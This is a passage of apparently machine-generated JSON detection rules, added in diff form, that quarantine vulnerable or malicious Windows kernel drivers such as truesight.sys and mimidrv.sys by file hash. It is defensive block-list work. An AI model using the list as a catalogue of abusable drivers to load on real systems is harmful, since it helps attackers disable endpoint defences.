"0748a661-bbaa-54af-a1a9-1711c94c0919", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604682Z", + "creation_date": "2026-03-23T11:45:29.604683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604689Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a234a2b8eb3844f7b5831ee048f88e8a76e9d38e753cc82f61b234c79fe1660", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07522169-0903-5d7a-a258-9894793239db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613188Z", + "creation_date": "2026-03-23T11:45:29.613190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70870e20f563899e4f05be2d0049cb495552b409ca7f4729a335bcbfffc3f47c", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0760d845-aa17-5f17-8fef-68d93506d3e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455304Z", + "creation_date": "2026-03-23T11:45:30.455307Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c509935f3812ad9b363754216561e0a529fc2d5b8e86bfa7302b8d149b7d04aa", + "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07664fd3-e35f-5924-9b44-fff36b1833a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474208Z", + "creation_date": "2026-03-23T11:45:31.474211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474220Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40168b00f67f66299e0dd90821d58cc99847b240cbdc5e55798d3faf8b517323", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "076fa59c-9e94-5898-9e7c-12b71b877968", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478443Z", + "creation_date": "2026-03-23T11:45:30.478447Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73fddd441a764e808ed6d6b8f3d0d13713e61221aa3cfef7da91cdaf112fe061", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07756c08-9011-51f9-83f6-0429ff62bac5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156126Z", + "creation_date": 
"2026-03-23T11:45:31.156128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156133Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e78e5d3343d079a8de332bf643119f9620744a02fa2996b9516388a104fa0acd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07850c35-b85f-58e0-8a78-3b9c6143b808", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488673Z", + "creation_date": "2026-03-23T11:45:31.488675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd2a221d679d56af948c3a60cbd005dce7efbcd1f99a07e06d3eba48691379b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "0788752b-690e-5df5-ac06-4bc27d3e8633", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467296Z", + "creation_date": "2026-03-23T11:45:30.467300Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467309Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c24f503462a98f7a8bf0dbff0c8242e1f3d4e6cdf4327152f508717f0eafee4b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0788872b-1998-5761-aec0-acf2cc5feb97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482760Z", + "creation_date": "2026-03-23T11:45:31.482764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.482775Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "598c6c1cb3fecd7406a21d28b231e24bf7803ebe7e460772add3a87819a59b88", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07a1edee-53c2-5aa8-84c6-1005c2d1246a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146241Z", + "creation_date": "2026-03-23T11:45:31.146243Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9f79647f8e09c23efd21d85cded1c6d91ff47bcb16875891373d700c9e644bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07a3621e-4039-5039-af12-13c8237a7916", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972988Z", + "creation_date": "2026-03-23T11:45:29.972990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82fbcb371d53b8a76a25fbbafaae31147c0d1f6b9f26b3ea45262c2267386989", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07a416f8-07e9-50e0-b38f-6eca0bb0b241", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817250Z", + "creation_date": "2026-03-23T11:45:31.817252Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817258Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", 
+ "value": "505264db711d807080156698d019b75f7cd384775a7cec86d078cbe6e933dee8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07a69adb-f0ad-58c3-bb73-3d07382bf3a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605210Z", + "creation_date": "2026-03-23T11:45:29.605212Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605217Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ed37798f26ed2db67c01ae5229da39071e6130f495dfff733f9353f657f1c59", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07ac79fc-c673-588b-8e41-55615dcec095", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828649Z", + "creation_date": "2026-03-23T11:45:30.828652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d0eed7d4a655baaf39a130beb78fbe1791a0b438ad13405fd5a1594127e4c01", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07c62b9a-7c5e-5f33-b40c-c4b59a8656a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825610Z", + "creation_date": "2026-03-23T11:45:31.825612Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2c83c208933e42e27a4be03b0f9b734c36339e48841f9fe47a5282eb17e47da", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07ca592e-16aa-589f-be76-6e0d2c6cd8c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973923Z", + "creation_date": "2026-03-23T11:45:29.973925Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b773511fdb2e370dec042530910a905472fcc2558eb108b246fd3200171b04d3", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07d6b9c1-6ddb-5113-a232-13e682d6f3d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817977Z", + "creation_date": 
"2026-03-23T11:45:30.817979Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817984Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2bc7514201727d773c09a1cfcfae793fcdbad98024251ccb510df0c269b04e6", + "comment": "Vulnerable Kernel Driver (aka sepdrv3_1.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07de29c1-1825-5bec-950a-12b06fcec1a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821134Z", + "creation_date": "2026-03-23T11:45:30.821137Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821146Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "898e07cf276ec2090b3e7ca7c192cc0fa10d6f13d989ef1cb5826ca9ce25b289", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07ea975a-45fc-52cf-995b-96cfd5923226", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815123Z", + "creation_date": "2026-03-23T11:45:31.815125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ad1dceb988c6c081726e950d2f420e2dac21c59160cc7919106e14988203cc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07ede0ac-ff29-5f78-9ec5-d97b29a62b77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821210Z", + "creation_date": "2026-03-23T11:45:31.821213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821220Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64da70b335897e3bc806bb4745fcc44fc80f3632edd418cb9ade3669cf29034b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07f2152c-8bdd-5451-87e2-bcfdbf7bb255", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820108Z", + "creation_date": "2026-03-23T11:45:31.820112Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fde6f8995ea6d7573471f2f60eed14d70759b3285543fb253fc1485d08982933", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07f73354-d356-5aca-b81c-889280b682bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618288Z", + "creation_date": "2026-03-23T11:45:29.618290Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618295Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c188b36f258f38193ace21a7d254f0aec36b59ad7e3f9bcb9c2958108effebad", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07fb1fa8-aef7-5519-8e01-94f1164526e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808987Z", + "creation_date": "2026-03-23T11:45:31.808989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "b6c7ad757caca0914847acb9672482005ef5ddc453484d54f6938ab1c594b7df", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08096db0-82c5-517d-9220-26d4a0decc85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479422Z", + "creation_date": "2026-03-23T11:45:30.479424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38d6d90d543bf6037023c1b1b14212b4fa07731cbbb44bdb17e8faffc12b22e8", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0810700b-96ed-5d09-b71e-0a8e87cdba4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
